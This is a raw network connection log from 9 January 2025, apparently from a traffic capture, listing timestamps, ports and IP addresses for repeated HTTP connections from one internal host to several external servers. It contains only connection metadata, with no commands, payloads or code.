Jan 9, 2025 08:31:21.376514912 CET	49729	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:31:21.687316895 CET	80	49729	47.83.1.90	192.168.11.20
Jan 9, 2025 08:31:26.581478119 CET	49730	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:26.718522072 CET	80	49730	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:26.718694925 CET	49730	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:26.722218037 CET	49730	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:26.858319998 CET	80	49730	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:26.858493090 CET	80	49730	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:26.858664989 CET	49730	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:28.236361027 CET	49730	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:29.253429890 CET	49731	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:29.389882088 CET	80	49731	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:29.390124083 CET	49731	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:29.393624067 CET	49731	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:29.529350042 CET	80	49731	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:29.529367924 CET	80	49731	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:29.529567003 CET	49731	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:30.907679081 CET	49731	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:31.924473047 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:32.061639071 CET	80	49732	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:32.061810017 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:32.068440914 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:32.068500996 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:32.204917908 CET	80	49732	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:32.204927921 CET	80	49732	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:32.205435991 CET	80	49732	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:32.205445051 CET	80	49732	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:32.205590010 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:33.578568935 CET	49732	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:34.595865965 CET	49733	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:34.734395981 CET	80	49733	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:34.734589100 CET	49733	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:34.737024069 CET	49733	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:34.876507998 CET	80	49733	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:34.876518011 CET	80	49733	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:34.876866102 CET	49733	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:34.877495050 CET	49733	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:31:35.014489889 CET	80	49733	13.248.169.48	192.168.11.20
Jan 9, 2025 08:31:40.535597086 CET	49734	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:40.897317886 CET	80	49734	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:40.897588015 CET	49734	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:40.901489019 CET	49734	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:41.260571957 CET	80	49734	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:41.262991905 CET	80	49734	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:41.263001919 CET	80	49734	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:41.263010979 CET	80	49734	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:41.263205051 CET	49734	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:42.404778004 CET	49734	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:43.420957088 CET	49735	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:43.780975103 CET	80	49735	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:43.781203985 CET	49735	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:43.785099983 CET	49735	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:44.144460917 CET	80	49735	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:44.145174980 CET	80	49735	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:44.145184040 CET	80	49735	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:44.145191908 CET	80	49735	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:44.145333052 CET	49735	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:45.295093060 CET	49735	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:46.310898066 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:46.654707909 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:46.654875040 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:46.658318996 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:46.658371925 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:46.658448935 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:47.002135992 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.002146006 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.002151966 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.002300024 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.002564907 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.002604961 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.003294945 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.003303051 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.003309011 CET	80	49736	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:47.003606081 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:48.169303894 CET	49736	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:49.186537027 CET	49737	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:49.538681984 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:49.538850069 CET	49737	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:49.541184902 CET	49737	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:49.892934084 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:49.893764973 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:49.893774986 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:49.893781900 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:49.894054890 CET	49737	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:49.895593882 CET	49737	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:31:50.246995926 CET	80	49737	160.25.166.123	192.168.11.20
Jan 9, 2025 08:31:55.050622940 CET	49738	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:55.169012070 CET	80	49738	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:55.169208050 CET	49738	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:55.175820112 CET	49738	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:55.294290066 CET	80	49738	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:55.304272890 CET	80	49738	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:55.304739952 CET	80	49738	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:55.304929018 CET	49738	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:56.683487892 CET	49738	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:57.700190067 CET	49739	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:57.818504095 CET	80	49739	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:57.818754911 CET	49739	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:57.822129011 CET	49739	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:57.940960884 CET	80	49739	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:57.950416088 CET	80	49739	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:57.950716019 CET	80	49739	172.67.132.227	192.168.11.20
Jan 9, 2025 08:31:57.950882912 CET	49739	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:31:59.323394060 CET	49739	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:00.340261936 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:00.458854914 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.459048033 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:00.462574005 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:00.462644100 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:00.581376076 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.581384897 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.581393957 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.581857920 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.582091093 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.588349104 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.588356972 CET	80	49740	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:00.588501930 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:01.979357958 CET	49740	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:02.994740963 CET	49741	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:03.113877058 CET	80	49741	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:03.114289999 CET	49741	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:03.119227886 CET	49741	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:03.238600016 CET	80	49741	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:03.248102903 CET	80	49741	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:03.248579979 CET	80	49741	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:03.248795033 CET	49741	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:03.249392033 CET	49741	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:32:03.368438005 CET	80	49741	172.67.132.227	192.168.11.20
Jan 9, 2025 08:32:18.642851114 CET	49742	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:18.866442919 CET	80	49742	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:18.866724968 CET	49742	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:18.873261929 CET	49742	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:19.097121000 CET	80	49742	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:19.097394943 CET	80	49742	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:19.097402096 CET	80	49742	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:19.097553015 CET	49742	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:20.381283998 CET	49742	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:21.398133039 CET	49743	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:21.622313023 CET	80	49743	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:21.622771978 CET	49743	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:21.629374027 CET	49743	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:21.853580952 CET	80	49743	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:21.854053020 CET	80	49743	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:21.854060888 CET	80	49743	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:21.854286909 CET	49743	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:23.130773067 CET	49743	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.147350073 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.376152992 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.376362085 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.382992983 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.383043051 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.383105040 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:24.611711025 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.611911058 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.612154007 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.612540007 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.612612009 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.612808943 CET	80	49744	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:24.612957954 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:25.895745039 CET	49744	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:26.911401033 CET	49745	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:27.138554096 CET	80	49745	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:27.138783932 CET	49745	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:27.142232895 CET	49745	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:27.369559050 CET	80	49745	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:27.369851112 CET	80	49745	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:27.369862080 CET	80	49745	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:27.370105028 CET	49745	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:27.371144056 CET	49745	80	192.168.11.20	136.243.64.147
Jan 9, 2025 08:32:27.598216057 CET	80	49745	136.243.64.147	192.168.11.20
Jan 9, 2025 08:32:32.728513002 CET	49746	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:33.024914980 CET	80	49746	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:33.025125980 CET	49746	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:33.028630018 CET	49746	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:33.325078964 CET	80	49746	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:33.368633032 CET	80	49746	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:33.368645906 CET	80	49746	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:33.368776083 CET	49746	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:34.534348011 CET	49746	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:35.551296949 CET	49747	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:35.853907108 CET	80	49747	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:35.854235888 CET	49747	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:35.857700109 CET	49747	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:36.160435915 CET	80	49747	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:36.202699900 CET	80	49747	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:36.202711105 CET	80	49747	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:36.202930927 CET	49747	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:37.361524105 CET	49747	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.377619028 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.684631109 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.684849977 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.688401937 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.688452005 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.688512087 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:38.995393991 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.995655060 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.995913029 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.995919943 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.996170998 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:38.996177912 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:39.045723915 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:39.045734882 CET	80	49748	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:39.045962095 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:40.204530954 CET	49748	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:41.220782995 CET	49749	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:41.525682926 CET	80	49749	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:41.525856018 CET	49749	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:41.528565884 CET	49749	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:41.833379984 CET	80	49749	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:42.060551882 CET	80	49749	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:42.060564041 CET	80	49749	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:42.060950994 CET	49749	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:42.061626911 CET	49749	80	192.168.11.20	202.95.11.110
Jan 9, 2025 08:32:42.366300106 CET	80	49749	202.95.11.110	192.168.11.20
Jan 9, 2025 08:32:47.259145021 CET	49750	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:47.397408009 CET	80	49750	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:47.397696972 CET	49750	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:47.401148081 CET	49750	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:47.538239956 CET	80	49750	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:47.538249969 CET	80	49750	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:47.538449049 CET	49750	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:48.905916929 CET	49750	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:49.921998978 CET	49751	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:50.060143948 CET	80	49751	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:50.060354948 CET	49751	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:50.063817024 CET	49751	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:50.200700045 CET	80	49751	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:50.200711966 CET	80	49751	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:50.200933933 CET	49751	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:51.577112913 CET	49751	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:52.594429970 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:52.731972933 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.732150078 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:52.740032911 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:52.740096092 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:52.876386881 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.876578093 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.876846075 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.877162933 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.877172947 CET	80	49752	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:52.877470970 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:54.248409033 CET	49752	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.265647888 CET	49753	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.402657032 CET	80	49753	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:55.402843952 CET	49753	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.407700062 CET	49753	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.548429966 CET	80	49753	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:55.548449039 CET	80	49753	76.223.54.146	192.168.11.20
Jan 9, 2025 08:32:55.548708916 CET	49753	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.549334049 CET	49753	80	192.168.11.20	76.223.54.146
Jan 9, 2025 08:32:55.685077906 CET	80	49753	76.223.54.146	192.168.11.20
Jan 9, 2025 08:33:00.735553026 CET	49754	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:00.909406900 CET	80	49754	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:00.909612894 CET	49754	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:00.913116932 CET	49754	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:01.087076902 CET	80	49754	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:01.166862011 CET	80	49754	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:01.166872025 CET	80	49754	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:01.167021990 CET	49754	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:02.418533087 CET	49754	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:03.435849905 CET	49755	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:03.609491110 CET	80	49755	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:03.609678984 CET	49755	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:03.615832090 CET	49755	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:03.789671898 CET	80	49755	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:03.869601011 CET	80	49755	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:03.869833946 CET	80	49755	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:03.869987965 CET	49755	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:05.121659994 CET	49755	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:06.138355970 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:06.311840057 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.312117100 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:06.315614939 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:06.315635920 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:06.489522934 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.489531040 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.489537954 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.489984989 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.489995003 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:06.490233898 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:07.823623896 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.135366917 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.504431963 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.504445076 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.504606009 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.504693031 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.504693031 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.504765034 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.504868031 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.505069971 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.532824993 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.533023119 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.678378105 CET	80	49756	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:08.678586006 CET	49756	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:08.840866089 CET	49757	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:09.014439106 CET	80	49757	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:09.014683962 CET	49757	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:09.019402027 CET	49757	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:09.192940950 CET	80	49757	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:09.275846958 CET	80	49757	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:09.275857925 CET	80	49757	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:09.276293993 CET	49757	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:09.276998043 CET	49757	80	192.168.11.20	103.106.67.112
Jan 9, 2025 08:33:09.450400114 CET	80	49757	103.106.67.112	192.168.11.20
Jan 9, 2025 08:33:14.464080095 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:14.587889910 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:14.588099003 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:14.591558933 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:14.710653067 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:15.037329912 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:15.037341118 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:15.037350893 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:15.037580013 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:15.037961006 CET	80	49758	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:15.038166046 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:16.103566885 CET	49758	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:17.120357037 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:17.239486933 CET	80	49759	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:17.239664078 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:17.243159056 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:17.362334013 CET	80	49759	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:17.493297100 CET	80	49759	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:17.493313074 CET	80	49759	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:17.493556976 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:17.493823051 CET	80	49759	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:17.493993998 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:18.759278059 CET	49759	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:19.775995970 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:19.894694090 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:19.894922018 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:19.898442984 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:19.898489952 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:20.017122984 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.017368078 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.017378092 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.017630100 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.017643929 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.017652035 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.202405930 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.202415943 CET	80	49760	104.21.64.1	192.168.11.20
